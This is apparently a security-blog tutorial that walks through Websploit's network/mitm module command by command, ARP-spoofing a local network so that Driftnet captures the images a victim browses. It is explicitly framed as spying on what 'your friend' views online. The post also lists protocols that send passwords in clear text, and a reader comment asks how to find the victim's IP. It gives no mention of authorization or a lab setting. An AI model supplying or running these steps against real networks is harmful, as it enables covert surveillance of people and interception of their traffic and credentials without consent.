
Driftnet – Tool Used to Capture Images That Your Friend Is Looking at Online

This tutorial shows how to launch a MITM attack with Websploit and Driftnet, a tool used to capture images.

A MITM (man-in-the-middle) attack is a type of cyber attack where the attacker intercepts communication between two parties.

Step 1: Install websploit in Kali if it is not already present.

root@kali:~# apt-get install websploit

Step 2: Run websploit.

root@kali:~# websploit

Step 3: List the modules available in websploit.

wsf > show modules

Step 4: Select network/mitm under Network modules and display its options.

wsf > use network/mitm
wsf:MITM > show options

Interface: Specify the network interface that matches your network adapter, for example:

  • set Interface eth0
  • set Interface wlan0

Router: Specify the router IP, which can be found with the command route -n.

set Router (Gateway IP)

Target: The victim machine's IP address, which can be found with ipconfig on Windows and ifconfig on Linux.

Step 5: Everything is set, so it is time to run the sniffer. Once you run it, IP forwarding is enabled and ARP spoofing begins; after that, the sniffers start up.

wsf:MITM > run

Step 6: Now go to the victim machine and start surfing; all the images will be captured by Driftnet.

Here you can find the pictures that your friend is viewing online.

Protocols Vulnerable to Sniffing

  • HTTP: Sends passwords in clear text
  • TELNET: Transfers commands in plain text
  • SNMP: Sends passwords in clear text
  • POP: Sends passwords in clear text
  • FTP: Sends passwords in clear text
  • NNTP: Sends passwords in clear text
  • IMAP: Sends passwords in clear text

If you have any doubts, please don’t hesitate to leave a comment.


Gurubaran

Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

View Comments

  • As you mentioned above (Victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.), for this we need physical access to the victim's machine, right? I'm confused here, please help me!
